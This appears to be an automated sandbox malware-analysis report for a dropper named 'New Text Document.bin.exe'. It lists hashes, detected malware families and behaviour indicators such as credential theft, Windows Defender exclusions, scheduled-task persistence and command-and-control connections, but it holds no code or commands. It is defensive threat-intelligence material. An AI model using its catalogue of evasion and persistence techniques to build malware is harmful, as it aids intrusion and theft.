| File name: | New Text Document.bin.exe |
| Full analysis: | https://app.any.run/tasks/5b260113-d154-4cab-bc42-af53c170fd39 |
| Verdict: | Malicious activity |
| Threats: | Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security. |
| Analysis date: | April 27, 2024, 17:10:29 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | 0B0D247AA1F24C2F5867B3BF29F69450 |
| SHA1: | 48DE9F34226FD7F637E2379365BE035AF5C0DF1A |
| SHA256: | A6E7292E734C3A15CFA654BBA8DEA72A2F55F1C24CF6BBDC2FD7E63887E9315A |
| SSDEEP: | 12288:dcgCzNHJj96xfKJStJkRm3bYXob0AnmFMcaGQxkZVVVVVVVVVAtVVVUvqGV:UQKgLIQmFuGQxklvqO |
MALICIOUS
Drops the executable file immediately after the start
- New Text Document.bin.exe (PID: 3968)
- New Text Document.exe (PID: 1764)
- xie.exe (PID: 588)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- nikto.exe (PID: 2888)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 3028)
- pei.exe (PID: 3012)
- build3.exe (PID: 3284)
- 1433118187.exe (PID: 3392)
- 1097519442.exe (PID: 3240)
- New Text Document.exe (PID: 2480)
- setup.exe (PID: 2688)
- New Text Document.exe (PID: 2124)
- Install.exe (PID: 3544)
- maza-0.16.3-win64-setup-unsigned.exe (PID: 2012)
- amadka.exe (PID: 1900)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
- cvtres.exe (PID: 580)
- 070.exe (PID: 3524)
- fud_new.exe (PID: 2368)
- is-1R2QT.tmp (PID: 3480)
- cddvdrunner2333.exe (PID: 1932)
- amadey.exe (PID: 2332)
- explorta.exe (PID: 2256)
- New Text Document.exe (PID: 1596)
- FSGFvbD.exe (PID: 3312)
- ISetup7.exe (PID: 3528)
- Dctooux.exe (PID: 1020)
- RclAdIP.exe (PID: 5944)
- u2q0.0.exe (PID: 4972)
- maza-qt.exe (PID: 2812)
- amert.exe (PID: 5716)
- NewB.exe (PID: 6036)
- New Text Document.exe (PID: 3516)
- LtFjhrz.exe (PID: 4508)
- ISetup8.exe (PID: 3568)
- st200.exe (PID: 4820)
- Vqmqsfffubp.exe (PID: 4220)
- UFCsaeI.exe (PID: 1884)
- cmd.exe (PID: 924)
- Orifaaywu.exe (PID: 5176)
- ODiosFd.exe (PID: 4460)
- xiaowei.exe (PID: 5420)
- timeSync.exe (PID: 5748)
- ISetup8.exe (PID: 4352)
HAUSBOMBER has been detected (YARA)
- New Text Document.exe (PID: 1764)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 1596)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 3028)
- New Text Document.exe (PID: 2480)
- New Text Document.exe (PID: 2124)
- New Text Document.exe (PID: 3516)
- New Text Document.exe (PID: 4772)
- New Text Document.exe (PID: 3744)
Changes the autorun value in the registry
- nikto.exe (PID: 2888)
- 1433118187.exe (PID: 3392)
- 1097519442.exe (PID: 3240)
- cvtres.exe (PID: 580)
- explorta.exe (PID: 2256)
- NewB.exe (PID: 6036)
- s.exe (PID: 4512)
RISEPRO has been detected (SURICATA)
- nikto.exe (PID: 2888)
- explorta.exe (PID: 3576)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- cbf5cbbc78.exe (PID: 5704)
Uses Task Scheduler to autorun other applications
- nikto.exe (PID: 2888)
- RclAdIP.exe (PID: 5944)
- Vqmqsfffubp.exe (PID: 4220)
- Spotify.exe (PID: 4436)
- ODiosFd.exe (PID: 4460)
RaccoonClipper scheduled task has been detected
- schtasks.exe (PID: 3272)
- schtasks.exe (PID: 2424)
Changes appearance of the Explorer extensions
- 1433118187.exe (PID: 3392)
Changes Security Center notification settings
- 1433118187.exe (PID: 3392)
- 1097519442.exe (PID: 3240)
Creates or modifies Windows services
- 1433118187.exe (PID: 3392)
Changes the Windows auto-update feature
- 1433118187.exe (PID: 3392)
Connects to the CnC server
- 1433118187.exe (PID: 3392)
- qausarneedscrypted.exe (PID: 3804)
- nikto.exe (PID: 2888)
- explorta.exe (PID: 2256)
- u2q0.0.exe (PID: 4972)
- jok.exe (PID: 4504)
- s.exe (PID: 4512)
RISEPRO has been detected (YARA)
- nikto.exe (PID: 2888)
- explorta.exe (PID: 3576)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- cbf5cbbc78.exe (PID: 5704)
DBATLOADER has been detected (YARA)
- HJC.exe (PID: 3708)
ASYNCRAT has been detected (SURICATA)
- qausarneedscrypted.exe (PID: 3804)
QUASAR has been detected (YARA)
- qausarneedscrypted.exe (PID: 3804)
- Spotify.exe (PID: 4436)
RACCOONCLIPPER has been detected (YARA)
- mstsca.exe (PID: 2616)
Run PowerShell with an invisible window
- powershell.exe (PID: 2628)
- powershell.exe (PID: 3108)
- powershell.exe (PID: 2008)
- powershell.EXE (PID: 2664)
- powershell.exe (PID: 2592)
- powershell.exe (PID: 4140)
- powershell.exe (PID: 5420)
- powershell.exe (PID: 4592)
- powershell.exe (PID: 5592)
- powershell.exe (PID: 1832)
- powershell.exe (PID: 5412)
- powershell.exe (PID: 5560)
- powershell.exe (PID: 5884)
- powershell.exe (PID: 5860)
Uses WMIC.EXE to add exclusions to the Windows Defender
- powershell.exe (PID: 3108)
- powershell.exe (PID: 2592)
- powershell.exe (PID: 5420)
- powershell.exe (PID: 4592)
- powershell.exe (PID: 1832)
- powershell.exe (PID: 5884)
- powershell.exe (PID: 5860)
Changes powershell execution policy (Bypass)
- cmd.exe (PID: 3820)
Bypass execution policy to execute commands
- powershell.exe (PID: 3328)
Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
- powershell.exe (PID: 3328)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 3328)
Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
- powershell.exe (PID: 3328)
Steals credentials from Web Browsers
- nikto.exe (PID: 2888)
- rundll32.exe (PID: 4572)
- RclAdIP.exe (PID: 5944)
- jok.exe (PID: 4504)
- Orifaaywu.exe (PID: 5176)
- ODiosFd.exe (PID: 4460)
- u2q0.0.exe (PID: 4972)
Creates a writable file in the system directory
- powershell.exe (PID: 2008)
- RclAdIP.exe (PID: 5944)
Steals credentials
- nikto.exe (PID: 2888)
- u2q0.0.exe (PID: 4972)
- Orifaaywu.exe (PID: 5176)
- timeSync.exe (PID: 5748)
Actions looks like stealing of personal data
- FSGFvbD.exe (PID: 3312)
- rundll32.exe (PID: 4572)
- RclAdIP.exe (PID: 5944)
- nikto.exe (PID: 2888)
- u2q0.0.exe (PID: 4972)
- cvtres.exe (PID: 5480)
- UFCsaeI.exe (PID: 1884)
- Orifaaywu.exe (PID: 5176)
- jok.exe (PID: 4504)
- dialer.exe (PID: 5884)
- ODiosFd.exe (PID: 4460)
Create files in the Startup directory
- cvtres.exe (PID: 580)
- nikto.exe (PID: 2888)
AMADEY has been detected (YARA)
- explorta.exe (PID: 2256)
- Dctooux.exe (PID: 1020)
- rundll32.exe (PID: 3680)
- NewB.exe (PID: 6036)
XWORM has been detected (YARA)
- cvtres.exe (PID: 580)
AMADEY has been detected (SURICATA)
- explorta.exe (PID: 2256)
- Dctooux.exe (PID: 1020)
- NewB.exe (PID: 6036)
Modifies exclusions in Windows Defender
- reg.exe (PID: 3368)
- reg.exe (PID: 4444)
- reg.exe (PID: 4512)
- reg.exe (PID: 4620)
- reg.exe (PID: 4740)
- reg.exe (PID: 4792)
- reg.exe (PID: 4916)
- reg.exe (PID: 4896)
- reg.exe (PID: 4936)
- reg.exe (PID: 4676)
- reg.exe (PID: 4820)
GCLEANER has been detected (SURICATA)
- ISetup7.exe (PID: 3528)
- ISetup8.exe (PID: 3568)
STEALC has been detected (SURICATA)
- u2q0.0.exe (PID: 4972)
Modifies files in the Chrome extension folder
- RclAdIP.exe (PID: 5944)
- ODiosFd.exe (PID: 4460)
Unusual connection from system programs
- rundll32.exe (PID: 4572)
- rundll32.exe (PID: 5524)
- rundll32.exe (PID: 3680)
STEALC has been detected (YARA)
- u2q0.0.exe (PID: 4972)
- u2r4.0.exe (PID: 4996)
- timeSync.exe (PID: 5748)
- u3cw.0.exe (PID: 4324)
PHORPIEX has been detected (SURICATA)
- 1433118187.exe (PID: 3392)
- 1097519442.exe (PID: 3240)
Amadey has been detected
- NewB.exe (PID: 6036)
- NewB.exe (PID: 1796)
REDLINE has been detected (SURICATA)
- jok.exe (PID: 4504)
METASTEALER has been detected (SURICATA)
- jok.exe (PID: 4504)
REDLINE has been detected (YARA)
- jok.exe (PID: 4504)
Antivirus name has been found in the command line (generic signature)
- findstr.exe (PID: 4924)
- findstr.exe (PID: 2812)
STORMKITTY has been detected (YARA)
- Orifaaywu.exe (PID: 5176)
RHADAMANTHYS has been detected (SURICATA)
- dialer.exe (PID: 5884)
GH0ST has been detected (SURICATA)
- s.exe (PID: 4512)
SUSPICIOUS
Reads the Internet Settings
- New Text Document.bin.exe (PID: 3968)
- New Text Document.exe (PID: 1764)
- xie.exe (PID: 588)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1596)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 3028)
- pei.exe (PID: 3012)
- 1433118187.exe (PID: 3392)
- qausarneedscrypted.exe (PID: 3804)
- HJC.exe (PID: 3708)
- 1097519442.exe (PID: 3240)
- 1686428277.exe (PID: 1704)
- New Text Document.exe (PID: 2480)
- Install.exe (PID: 3544)
- New Text Document.exe (PID: 2124)
- disc.exe (PID: 1440)
- powershell.exe (PID: 2628)
- WMIC.exe (PID: 3396)
- Amzey.exe (PID: 3060)
- nikto.exe (PID: 2888)
- amadka.exe (PID: 1900)
- cvtres.exe (PID: 580)
- explorta.exe (PID: 2256)
- powershell.EXE (PID: 2664)
- fud_new.exe (PID: 2368)
- amadey.exe (PID: 2332)
- Dctooux.exe (PID: 1020)
- tVH4OnCbZyXaaaaXLi7l.exe (PID: 2788)
- ISetup7.exe (PID: 3528)
- u2q0.0.exe (PID: 4972)
- rundll32.exe (PID: 4572)
- rundll32.exe (PID: 3680)
- 5435d56940.exe (PID: 4992)
- LtFjhrz.exe (PID: 4508)
- NewB.exe (PID: 6036)
- powershell.exe (PID: 5592)
- New Text Document.exe (PID: 3516)
- WMIC.exe (PID: 4280)
- ISetup8.exe (PID: 3568)
- st200.exe (PID: 4820)
- Vqmqsfffubp.exe (PID: 4220)
- PatchesTextbook.exe (PID: 4412)
- Spotify.exe (PID: 4436)
- Orifaaywu.exe (PID: 5176)
- u2q0.3.exe (PID: 3300)
Reads security settings of Internet Explorer
- New Text Document.bin.exe (PID: 3968)
- New Text Document.exe (PID: 1764)
- xie.exe (PID: 588)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- pei.exe (PID: 3012)
- New Text Document.exe (PID: 3028)
- 1433118187.exe (PID: 3392)
- New Text Document.exe (PID: 2808)
- 1097519442.exe (PID: 3240)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 2480)
- Install.exe (PID: 3544)
- New Text Document.exe (PID: 2124)
- Amzey.exe (PID: 3060)
- FSGFvbD.exe (PID: 3312)
- nikto.exe (PID: 2888)
- amadka.exe (PID: 1900)
- explorta.exe (PID: 2256)
- fud_new.exe (PID: 2368)
- cvtres.exe (PID: 580)
- amadey.exe (PID: 2332)
- Dctooux.exe (PID: 1020)
- New Text Document.exe (PID: 1596)
- RclAdIP.exe (PID: 5944)
- ISetup7.exe (PID: 3528)
- u2q0.0.exe (PID: 4972)
- 5435d56940.exe (PID: 4992)
- LtFjhrz.exe (PID: 4508)
- NewB.exe (PID: 6036)
- New Text Document.exe (PID: 3516)
- UFCsaeI.exe (PID: 1884)
- ISetup8.exe (PID: 3568)
- st200.exe (PID: 4820)
- PatchesTextbook.exe (PID: 4412)
- ODiosFd.exe (PID: 4460)
Reads Internet Explorer settings
- New Text Document.bin.exe (PID: 3968)
Adds/modifies Windows certificates
- New Text Document.exe (PID: 1764)
- New Text Document.exe (PID: 2712)
- nikto.exe (PID: 2888)
- jok.exe (PID: 4504)
- New Text Document.exe (PID: 3516)
Reads settings of System Certificates
- New Text Document.exe (PID: 1764)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1596)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 3028)
- nikto.exe (PID: 2888)
- qausarneedscrypted.exe (PID: 3804)
- HJC.exe (PID: 3708)
- New Text Document.exe (PID: 2480)
- disc.exe (PID: 1440)
- New Text Document.exe (PID: 2124)
- maza-qt.exe (PID: 2812)
- explorta.exe (PID: 3576)
- New Text Document.exe (PID: 3516)
- NewB.exe (PID: 6036)
- Orifaaywu.exe (PID: 5176)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- cbf5cbbc78.exe (PID: 5704)
Executable content was dropped or overwritten
- New Text Document.exe (PID: 1764)
- xie.exe (PID: 588)
- New Text Document.bin.exe (PID: 3968)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 3028)
- pei.exe (PID: 3012)
- build3.exe (PID: 3284)
- 1433118187.exe (PID: 3392)
- nikto.exe (PID: 2888)
- 1097519442.exe (PID: 3240)
- New Text Document.exe (PID: 2480)
- setup.exe (PID: 2688)
- Install.exe (PID: 3544)
- maza-0.16.3-win64-setup-unsigned.exe (PID: 2012)
- amadka.exe (PID: 1900)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
- cvtres.exe (PID: 580)
- 070.exe (PID: 3524)
- fud_new.exe (PID: 2368)
- is-1R2QT.tmp (PID: 3480)
- cddvdrunner2333.exe (PID: 1932)
- amadey.exe (PID: 2332)
- New Text Document.exe (PID: 1596)
- explorta.exe (PID: 2256)
- FSGFvbD.exe (PID: 3312)
- ISetup7.exe (PID: 3528)
- Dctooux.exe (PID: 1020)
- RclAdIP.exe (PID: 5944)
- amert.exe (PID: 5716)
- u2q0.0.exe (PID: 4972)
- NewB.exe (PID: 6036)
- New Text Document.exe (PID: 3516)
- LtFjhrz.exe (PID: 4508)
- ISetup8.exe (PID: 3568)
- st200.exe (PID: 4820)
- Vqmqsfffubp.exe (PID: 4220)
- UFCsaeI.exe (PID: 1884)
- cmd.exe (PID: 924)
- Orifaaywu.exe (PID: 5176)
- ODiosFd.exe (PID: 4460)
- New Text Document.exe (PID: 2124)
- xiaowei.exe (PID: 5420)
- timeSync.exe (PID: 5748)
- ISetup8.exe (PID: 4352)
Reads Microsoft Outlook installation path
- New Text Document.bin.exe (PID: 3968)
Potential Corporate Privacy Violation
- New Text Document.exe (PID: 1764)
- New Text Document.exe (PID: 1824)
- xie.exe (PID: 588)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 3028)
- pei.exe (PID: 3012)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 2480)
- New Text Document.exe (PID: 1596)
- New Text Document.exe (PID: 2124)
- nikto.exe (PID: 2888)
- explorta.exe (PID: 2256)
- cvtres.exe (PID: 580)
- Dctooux.exe (PID: 1020)
- ISetup7.exe (PID: 3528)
- u2q0.0.exe (PID: 4972)
- NewB.exe (PID: 6036)
- New Text Document.exe (PID: 3516)
- ISetup8.exe (PID: 3568)
- Vqmqsfffubp.exe (PID: 4220)
- Spotify.exe (PID: 4436)
- Orifaaywu.exe (PID: 5176)
Connects to unusual port
- New Text Document.exe (PID: 1764)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1596)
- nikto.exe (PID: 2888)
- qausarneedscrypted.exe (PID: 3804)
- 1433118187.exe (PID: 3392)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2448)
- cvtres.exe (PID: 580)
- explorta.exe (PID: 3576)
- maza-qt.exe (PID: 2812)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- jok.exe (PID: 4504)
- cbf5cbbc78.exe (PID: 5704)
- dialer.exe (PID: 5884)
- s.exe (PID: 4512)
The process creates files with name similar to system file names
- New Text Document.exe (PID: 1824)
- setup.exe (PID: 2688)
- maza-0.16.3-win64-setup-unsigned.exe (PID: 2012)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
Process requests binary or script from the Internet
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2836)
- pei.exe (PID: 3012)
- New Text Document.exe (PID: 3028)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 2480)
- New Text Document.exe (PID: 2124)
- nikto.exe (PID: 2888)
- New Text Document.exe (PID: 1596)
- explorta.exe (PID: 2256)
- Dctooux.exe (PID: 1020)
- u2q0.0.exe (PID: 4972)
- NewB.exe (PID: 6036)
- New Text Document.exe (PID: 3516)
- ISetup7.exe (PID: 3528)
- ISetup8.exe (PID: 3568)
Process drops legitimate windows executable
- New Text Document.exe (PID: 2448)
- nikto.exe (PID: 2888)
- setup.exe (PID: 2688)
- cvtres.exe (PID: 580)
- is-1R2QT.tmp (PID: 3480)
- explorta.exe (PID: 2256)
- u2q0.0.exe (PID: 4972)
- timeSync.exe (PID: 5748)
Starts a Microsoft application from unusual location
- nikto.exe (PID: 2888)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
Connects to the server without a host name
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2836)
- 1433118187.exe (PID: 3392)
- New Text Document.exe (PID: 2808)
- 1097519442.exe (PID: 3240)
- New Text Document.exe (PID: 2480)
- New Text Document.exe (PID: 3028)
- New Text Document.exe (PID: 2124)
- explorta.exe (PID: 2256)
- nikto.exe (PID: 2888)
- u2q0.0.exe (PID: 4972)
- NewB.exe (PID: 6036)
- New Text Document.exe (PID: 3516)
- ISetup7.exe (PID: 3528)
- ISetup8.exe (PID: 3568)
Reads the BIOS version
- nikto.exe (PID: 2888)
- Install.exe (PID: 3544)
- amadka.exe (PID: 1900)
- explorta.exe (PID: 2256)
- 4h92v03hMhnmupQRAOq4.exe (PID: 1424)
- explorta.exe (PID: 3576)
- amert.exe (PID: 5716)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- LtFjhrz.exe (PID: 4508)
- cbf5cbbc78.exe (PID: 5704)
Contacting a server suspected of hosting an CnC
- nikto.exe (PID: 2888)
- qausarneedscrypted.exe (PID: 3804)
- explorta.exe (PID: 2256)
- Dctooux.exe (PID: 1020)
- explorta.exe (PID: 3576)
- u2q0.0.exe (PID: 4972)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- NewB.exe (PID: 6036)
- cbf5cbbc78.exe (PID: 5704)
- dialer.exe (PID: 5884)
- s.exe (PID: 4512)
Application launched itself
- build3.exe (PID: 2896)
- mstsca.exe (PID: 2180)
- mstsca.exe (PID: 1844)
- explorta.exe (PID: 2256)
- cmd.exe (PID: 924)
- mstsca.exe (PID: 4312)
- Omqimeq.exe (PID: 1472)
- mstsca.exe (PID: 4224)
Creates or modifies Windows services
- 1433118187.exe (PID: 3392)
Checks for external IP
- nikto.exe (PID: 2888)
- cvtres.exe (PID: 580)
- explorta.exe (PID: 3576)
- Vqmqsfffubp.exe (PID: 4220)
- Spotify.exe (PID: 4436)
- Orifaaywu.exe (PID: 5176)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- cbf5cbbc78.exe (PID: 5704)
Device Retrieving External IP Address Detected
- nikto.exe (PID: 2888)
- cvtres.exe (PID: 580)
- explorta.exe (PID: 3576)
- Vqmqsfffubp.exe (PID: 4220)
- Spotify.exe (PID: 4436)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- cbf5cbbc78.exe (PID: 5704)
The process executes via Task Scheduler
- mstsca.exe (PID: 2180)
- FSGFvbD.exe (PID: 3312)
- powershell.EXE (PID: 2664)
- mstsca.exe (PID: 1844)
- RclAdIP.exe (PID: 5944)
- rundll32.exe (PID: 5524)
- UFCsaeI.exe (PID: 1884)
- NewB.exe (PID: 1796)
- mstsca.exe (PID: 4312)
- cvtres.exe (PID: 5480)
- ODiosFd.exe (PID: 4460)
- NewB.exe (PID: 4380)
- cvtres.exe (PID: 4668)
- mstsca.exe (PID: 4224)
Drops 7-zip archiver for unpacking
- New Text Document.exe (PID: 2480)
- New Text Document.exe (PID: 3028)
Opens a file (MACROS)
- EXCEL.EXE (PID: 3100)
- EXCEL.EXE (PID: 5700)
Reads data from a file (MACROS)
- EXCEL.EXE (PID: 3100)
- EXCEL.EXE (PID: 5700)
Found strings related to reading or modifying Windows Defender settings
- Install.exe (PID: 3544)
- forfiles.exe (PID: 3152)
- forfiles.exe (PID: 3852)
- forfiles.exe (PID: 3828)
- forfiles.exe (PID: 3012)
- forfiles.exe (PID: 3276)
- FSGFvbD.exe (PID: 3312)
- forfiles.exe (PID: 3480)
- forfiles.exe (PID: 2536)
- forfiles.exe (PID: 2380)
- forfiles.exe (PID: 2552)
- forfiles.exe (PID: 2540)
- forfiles.exe (PID: 6000)
- RclAdIP.exe (PID: 5944)
- forfiles.exe (PID: 6076)
- forfiles.exe (PID: 6112)
- forfiles.exe (PID: 6040)
- forfiles.exe (PID: 5432)
- forfiles.exe (PID: 4436)
- LtFjhrz.exe (PID: 4508)
- forfiles.exe (PID: 5360)
- forfiles.exe (PID: 4348)
- forfiles.exe (PID: 5300)
- forfiles.exe (PID: 5172)
- forfiles.exe (PID: 3632)
- UFCsaeI.exe (PID: 1884)
- forfiles.exe (PID: 2320)
- forfiles.exe (PID: 4292)
- forfiles.exe (PID: 5232)
- forfiles.exe (PID: 4272)
- ODiosFd.exe (PID: 4460)
- forfiles.exe (PID: 5684)
- forfiles.exe (PID: 5028)
- forfiles.exe (PID: 4184)
- forfiles.exe (PID: 4696)
- forfiles.exe (PID: 6016)
- forfiles.exe (PID: 4584)
Starts CMD.EXE for commands execution
- Install.exe (PID: 3544)
- forfiles.exe (PID: 3152)
- forfiles.exe (PID: 3012)
- forfiles.exe (PID: 3852)
- forfiles.exe (PID: 3828)
- forfiles.exe (PID: 3188)
- forfiles.exe (PID: 3276)
- Amzey.exe (PID: 3060)
- forfiles.exe (PID: 3664)
- FSGFvbD.exe (PID: 3312)
- forfiles.exe (PID: 3480)
- forfiles.exe (PID: 2536)
- forfiles.exe (PID: 2380)
- forfiles.exe (PID: 2328)
- forfiles.exe (PID: 2552)
- forfiles.exe (PID: 2540)
- forfiles.exe (PID: 6000)
- RclAdIP.exe (PID: 5944)
- forfiles.exe (PID: 6076)
- forfiles.exe (PID: 6112)
- forfiles.exe (PID: 4112)
- forfiles.exe (PID: 6040)
- forfiles.exe (PID: 5432)
- forfiles.exe (PID: 4436)
- LtFjhrz.exe (PID: 4508)
- forfiles.exe (PID: 5360)
- forfiles.exe (PID: 4348)
- forfiles.exe (PID: 5300)
- forfiles.exe (PID: 5620)
- forfiles.exe (PID: 5172)
- forfiles.exe (PID: 3632)
- forfiles.exe (PID: 4772)
- forfiles.exe (PID: 2320)
- UFCsaeI.exe (PID: 1884)
- forfiles.exe (PID: 4292)
- forfiles.exe (PID: 4272)
- forfiles.exe (PID: 5232)
- forfiles.exe (PID: 5436)
- ODiosFd.exe (PID: 4460)
- PatchesTextbook.exe (PID: 4412)
- forfiles.exe (PID: 5028)
- forfiles.exe (PID: 4184)
- forfiles.exe (PID: 5684)
- forfiles.exe (PID: 4696)
- cmd.exe (PID: 924)
- forfiles.exe (PID: 4540)
- Orifaaywu.exe (PID: 5176)
- forfiles.exe (PID: 6016)
- forfiles.exe (PID: 4584)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 3376)
- cmd.exe (PID: 2972)
- cmd.exe (PID: 3568)
- cmd.exe (PID: 3664)
- cmd.exe (PID: 2468)
- cmd.exe (PID: 3460)
- cmd.exe (PID: 1312)
- cmd.exe (PID: 2232)
- cmd.exe (PID: 1212)
- cmd.exe (PID: 4120)
- wscript.exe (PID: 4200)
- cmd.exe (PID: 6008)
- cmd.exe (PID: 6048)
- cmd.exe (PID: 6120)
- cmd.exe (PID: 6084)
- cmd.exe (PID: 5508)
- cmd.exe (PID: 5588)
- cmd.exe (PID: 4524)
- cmd.exe (PID: 5712)
- cmd.exe (PID: 5264)
- cmd.exe (PID: 5116)
- cmd.exe (PID: 5240)
- cmd.exe (PID: 5344)
- cmd.exe (PID: 4604)
- cmd.exe (PID: 4172)
- cmd.exe (PID: 1432)
- cmd.exe (PID: 4640)
Searches and executes a command on selected files
- forfiles.exe (PID: 3012)
- forfiles.exe (PID: 3152)
- forfiles.exe (PID: 3852)
- forfiles.exe (PID: 3188)
- forfiles.exe (PID: 3828)
- forfiles.exe (PID: 3276)
- forfiles.exe (PID: 3480)
- forfiles.exe (PID: 3664)
- forfiles.exe (PID: 2380)
- forfiles.exe (PID: 2328)
- forfiles.exe (PID: 2552)
- forfiles.exe (PID: 2536)
- forfiles.exe (PID: 2540)
- forfiles.exe (PID: 6000)
- forfiles.exe (PID: 6112)
- forfiles.exe (PID: 4112)
- forfiles.exe (PID: 6040)
- forfiles.exe (PID: 6076)
- forfiles.exe (PID: 5432)
- forfiles.exe (PID: 4436)
- forfiles.exe (PID: 5360)
- forfiles.exe (PID: 4348)
- forfiles.exe (PID: 5620)
- forfiles.exe (PID: 5300)
- forfiles.exe (PID: 5172)
- forfiles.exe (PID: 3632)
- forfiles.exe (PID: 4772)
- forfiles.exe (PID: 2320)
- forfiles.exe (PID: 4292)
- forfiles.exe (PID: 5232)
- forfiles.exe (PID: 4272)
- forfiles.exe (PID: 5436)
- forfiles.exe (PID: 4696)
- forfiles.exe (PID: 5028)
- forfiles.exe (PID: 4184)
- forfiles.exe (PID: 5684)
- forfiles.exe (PID: 4540)
- forfiles.exe (PID: 6016)
- forfiles.exe (PID: 4584)
Powershell scripting: start process
- cmd.exe (PID: 2256)
- cmd.exe (PID: 1936)
- cmd.exe (PID: 3292)
- cmd.exe (PID: 5496)
- cmd.exe (PID: 5540)
- cmd.exe (PID: 5900)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 2256)
- cmd.exe (PID: 3208)
- cmd.exe (PID: 3820)
- cmd.exe (PID: 1936)
- cmd.exe (PID: 3460)
- cmd.exe (PID: 3292)
- rundll32.exe (PID: 4572)
- cmd.exe (PID: 5392)
- cmd.exe (PID: 4428)
- cmd.exe (PID: 5496)
- cmd.exe (PID: 2876)
- cmd.exe (PID: 5540)
- cmd.exe (PID: 5900)
- cmd.exe (PID: 952)
- cmd.exe (PID: 5204)
Probably obfuscated PowerShell command line is found
- cmd.exe (PID: 3820)
Cryptography encrypted command line is found
- powershell.exe (PID: 3328)
The process bypasses the loading of PowerShell profile settings
- cmd.exe (PID: 3820)
Executing commands from a ".bat" file
- Amzey.exe (PID: 3060)
- PatchesTextbook.exe (PID: 4412)
Reads browser cookies
- nikto.exe (PID: 2888)
- jok.exe (PID: 4504)
Accesses Microsoft Outlook profiles
- nikto.exe (PID: 2888)
- rundll32.exe (PID: 4572)
- dialer.exe (PID: 5884)
Searches for installed software
- nikto.exe (PID: 2888)
- u2q0.0.exe (PID: 4972)
- jok.exe (PID: 4504)
- dialer.exe (PID: 5884)
Malware-specific behavior (creating "System.dll" in Temp)
- maza-0.16.3-win64-setup-unsigned.exe (PID: 2012)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
Starts itself from another location
- amadka.exe (PID: 1900)
- fud_new.exe (PID: 2368)
- amadey.exe (PID: 2332)
- RclAdIP.exe (PID: 5944)
- Vqmqsfffubp.exe (PID: 4220)
The process connected to a server suspected of theft
- nikto.exe (PID: 2888)
- rundll32.exe (PID: 4572)
- u2q0.0.exe (PID: 4972)
Reads the Windows owner or organization settings
- is-1R2QT.tmp (PID: 3480)
Creates a software uninstall entry
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
- RclAdIP.exe (PID: 5944)
- ODiosFd.exe (PID: 4460)
Runs shell command (SCRIPT)
- wscript.exe (PID: 4200)
Uses NETSH.EXE to obtain data on the network
- rundll32.exe (PID: 4572)
- cmd.exe (PID: 4292)
- cmd.exe (PID: 5392)
Uses RUNDLL32.EXE to load library
- Dctooux.exe (PID: 1020)
Loads DLL from Mozilla Firefox
- rundll32.exe (PID: 4572)
- dialer.exe (PID: 5884)
Creates file in the systems drive root
- rundll32.exe (PID: 4572)
Windows Defender mutex has been found
- u2q0.0.exe (PID: 4972)
Gets file extension (POWERSHELL)
- powershell.exe (PID: 4348)
Checks Windows Trust Settings
- RclAdIP.exe (PID: 5944)
- NewB.exe (PID: 6036)
- ODiosFd.exe (PID: 4460)
The process drops Mozilla's DLL files
- u2q0.0.exe (PID: 4972)
- timeSync.exe (PID: 5748)
The process drops C-runtime libraries
- u2q0.0.exe (PID: 4972)
- timeSync.exe (PID: 5748)
Using 'findstr.exe' to search for text patterns in files and output
